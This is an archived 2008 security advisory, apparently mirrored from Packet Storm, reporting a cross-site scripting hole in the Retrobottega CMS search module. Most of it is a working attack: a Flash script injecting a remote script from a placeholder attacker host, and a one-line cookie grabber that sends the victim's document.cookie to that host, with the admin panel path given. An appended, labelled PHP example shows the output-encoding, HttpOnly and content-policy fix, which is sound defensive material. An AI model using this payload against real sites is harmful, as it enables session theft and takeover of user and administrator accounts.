retrobottega-xss.txt

14 Mar 2008 00:00:00 | Reported by: cybermilitant | Type: packetstorm | Source: packetstormsecurity.com

Retrobottega cms XSS vulnerability, allows injection of malicious JavaScript for cookie stealing

Code
`----------------------------------------------------------------------------------  
  
  
Author: cybermilitant   
Site: www.hacktime.org  
Vendor's site: www.ilretrobottega.net  
E-Mail: [email protected]   
Vulnerability: Cross Site Scripting (XSS)  
Description: Retrobottega CMS is susceptible to a cross-site scripting vulnerability. The search module is vulnerable, and you can inject a simple JavaScript to execute XSS attacks. You only need to edit the script so that it redirects to your cookie stealer.  
  
--->Thanks to: nexen<---  
  
Flash script:  
-------------------------------------------------------------------  
var target:String = "art";  
var lang:String = " it";  
var nome_pagina:String = "RISULTATI_RICERCA";  
var testo_da_ricercare:String = "<script src="http://[MYSITE]/documents.js"</script> ";  
var invia:String = "CERCA nel sito";  
  
getURL("[TARGET]/trovato.php", "_self", "POST");  
-------------------------------------------------------------------  
  
documents.js  
-------------------------------------------------------------------  
document.location='http://[MYSITE]/documents.php?c='+escape(document.cookie);  
-------------------------------------------------------------------  
  
In the end the classical cookie grabber...  
  
The administrator board is here: http://[TARGET]/gestione/index.php  
  
`
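The fix for the reflected search term described in the advisory, shown as an added example (not Retrobottega's code and not part of the original advisory): the weak raw echo beside the encoded form, plus session cookie flags that keep the cookie out of reach of `document.cookie`. Only the field name `testo_da_ricercare` comes from the advisory; the function names and markup are hypothetical, and the block assumes PHP 7.3+ served over HTTPS.

```php
<?php
// Added example. Hypothetical handler for a search results page; the real
// trovato.php source is not shown in the advisory.

// Encode a value for HTML text and quoted-attribute contexts.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Weak form: the submitted term is concatenated into the page unencoded,
// so any markup in it is parsed by the browser.
function render_results_unsafe(string $term): string
{
    return '<p>Risultati per: ' . $term . '</p>';
}

// Corrected form: the term is encoded at the point of output.
function render_results_safe(string $term): string
{
    return '<p>Risultati per: ' . html_escape($term) . '</p>';
}

if (PHP_SAPI === 'cli') {
    // Constructed sample input, harmless markup only.
    $sample = '<i title="x">test</i>';
    echo render_results_unsafe($sample), PHP_EOL; // markup survives
    echo render_results_safe($sample), PHP_EOL;   // markup is inert text
} else {
    // HttpOnly hides the session cookie from script; Secure assumes HTTPS.
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();

    // Defence in depth: refuse scripts loaded from other origins.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
    header('Content-Type: text/html; charset=UTF-8');

    $term = $_POST['testo_da_ricercare'] ?? '';
    if (!is_string($term)) {
        $term = ''; // arrays such as testo_da_ricercare[]=x are rejected
    }
    echo render_results_safe($term);
}
```

Encoding must happen at every place the term is written back, including the value attribute of the search box if the form is redisplayed.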

Vulners AI Score: 7.4 (High risk)